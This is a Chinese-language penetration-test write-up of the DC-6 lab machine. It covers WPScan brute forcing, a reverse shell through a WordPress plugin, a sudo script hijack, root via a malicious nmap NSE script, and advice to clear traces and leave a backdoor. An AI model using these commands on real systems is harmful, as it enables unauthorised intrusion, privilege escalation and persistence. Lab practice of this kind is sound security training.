DC-6渗透测试
0x00实验环境
靶机:DC-6,IP地址:192.168.8.141
测试机:Kali,IP地址:192.168.8.140;
0x01实验流程
信息收集——主机发现、端口扫描
渗透测试
0x02实验步骤
- 主机发现
- 端口及服务扫描
- 访问web端
考虑需要添加hosts记录
正常访问
- Wpscan扫描站点
wpscan --url http://wordy/ -e u 暴力枚举用户名
我们现在得到用户名,再根据提示得到密码字典
更名为dc6password.txt
暴力**用户名密码得到
(wpscan --url http://wordy/ -U dc6user.txt -P dc6password.txt)
Mark : helpdesk01
登录wordpress后台
- 在后台发现activity monitor,查找相关漏洞
修改html中的内容
kali开启web服务并访问该html,同时开启nc监听
成功getshell
- python -c 'import pty;pty.spawn("/bin/bash")'开启终端
切换到mark目录下查看文件
得到graham - GSo7isUM1D4
Ssh登录graham
在jens的用户目录下发现shell脚本,并且此脚本有执行权限
此脚本在当前用户下有读写权限,修改脚本内容,在末尾增加/bin/bash,当执行时可以获得jens的shell
echo '/bin/bash' >> backups.sh
sudo -u jens ./backups.sh
成功切换到jens用户
- 查看jens可以使用的root权限命令
Nmap
nmap有执行脚本的功能,通过编写特殊脚本,可以实现利用nmap提权
写入:
echo 'os.execute("/bin/sh")' >get_root.nse
sudo nmap --script=/home/jens/get_root.nse
成功提权
- 清理痕迹,留下后门如一句话之类的
总结:
- 由于是wordpress站点,所以首先扫描用户
- 再根据提示生成针对性字典,**出用户名密码
- 登录wp后台,寻找漏洞并利用以getshell
- 再getshell以后仔细发现有用文件以及可用命令,用以提升权限